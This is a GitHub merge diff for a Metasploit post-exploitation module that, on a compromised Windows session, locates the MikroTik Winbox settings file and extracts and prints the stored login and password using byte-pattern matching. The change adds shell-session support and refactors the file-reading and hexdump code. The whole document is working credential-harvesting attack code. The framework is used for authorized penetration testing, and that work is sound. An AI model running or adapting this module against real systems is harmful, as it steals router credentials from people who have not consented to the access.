Merge pull request #1 from bwatters-r7/update-18604

Quick change to add support for more sessions and to only read the fi…
rapid7 · Jan 7, 2024 · 469a325 · 469a325
2 parents 48e2e09 + a0bc08c
commit 469a325
Showing 1 changed file with 24 additions and 36 deletions.
diff --git a/modules/post/windows/gather/credentials/winbox_settings.rb b/modules/post/windows/gather/credentials/winbox_settings.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Post
 
   include Msf::Post::Common
+  include Msf::Post::File
   include Msf::Post::Windows::UserProfiles
 
   def initialize(info = {})
@@ -21,22 +22,11 @@ def initialize(info = {})
         'License' => MSF_LICENSE,
         'Author' => ['Pasquale \'sid\' Fiorillo'], # www.pasqualefiorillo.it - Thanks to: www.isgroup.biz
         'Platform' => ['win'],
-        'SessionTypes' => ['meterpreter'],
+        'SessionTypes' => ['meterpreter', 'shell'],
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
           'SideEffects' => []
-        },
-        'Compat' => {
-          'Meterpreter' => {
-            'Commands' => %w[
-              core_channel_eof
-              core_channel_open
-              core_channel_read
-              core_channel_write
-              stdapi_fs_stat
-            ]
-          }
         }
       )
     )
@@ -52,42 +42,40 @@ def run
   end
 
   def check_appdata(path)
-    client.fs.file.stat(path)
-    print_good("Found File at #{path}")
+    if file_exist?(path)
+      print_good("Found File at #{path}")
+      data = read_file(path)
+      if datastore['VERBOSE']
+        print_hexdump(data)
+      end
+      parse(data)
 
-    if datastore['VERBOSE']
-      print_hexdump(path)
+    else
+      print_status("#{path} not found ....")
     end
-
-    parse(path)
-  rescue StandardError
-    print_status("#{path} not found ....")
   end
 
-  def print_hexdump(path)
-    file = client.fs.file.new(path, 'rb')
-    while (chunk = file.read(16))
-      hex_values = chunk.each_byte.map { |b| sprintf('%02x', b) }.join(' ')
-      ascii_values = chunk.gsub(/[^[:print:]]/, '.')
-      print_status("#{hex_values.ljust(48)} #{ascii_values}")
+  def file_data; end
+
+  def print_hexdump(data)
+    index = 0
+    while index < data.length
+      chunk = data[index, [16, data.length - index].min]
+      hex_chunk = chunk.each_byte.map { |b| sprintf('%02x', b) }.join(' ')
+      ascii_chunk = chunk.gsub(/[^[:print:]]/, '.')
+      print_status("#{hex_chunk.ljust(48)} #{ascii_chunk}")
+      index += 16
     end
-  rescue Errno::ENOENT
-    print_error("File not found: #{path}")
   rescue StandardError => e
     print_error("An error occurred: #{e.message}")
   end
 
-  def parse(path)
-    file = client.fs.file.new(path, 'rb')
-    buffer = file.read
-
-    login = buffer.match(/\x00\x05login(.*)\x08\x00/)
+  def parse(data)
+    login = data.match(/\x00\x05login(.*)\x08\x00/)
     print_good("Login: #{login[1]}")
 
-    password = buffer.match(/\x00\x03pwd(.*)\x0B\x00/)
+    password = data.match(/\x00\x03pwd(.*)\x0B\x00/)
     print_good("Password: #{password[1]}")
-  rescue Errno::ENOENT
-    print_error("File not found: #{path}")
   rescue StandardError => e
     print_error("An error occurred: #{e.message}")
   end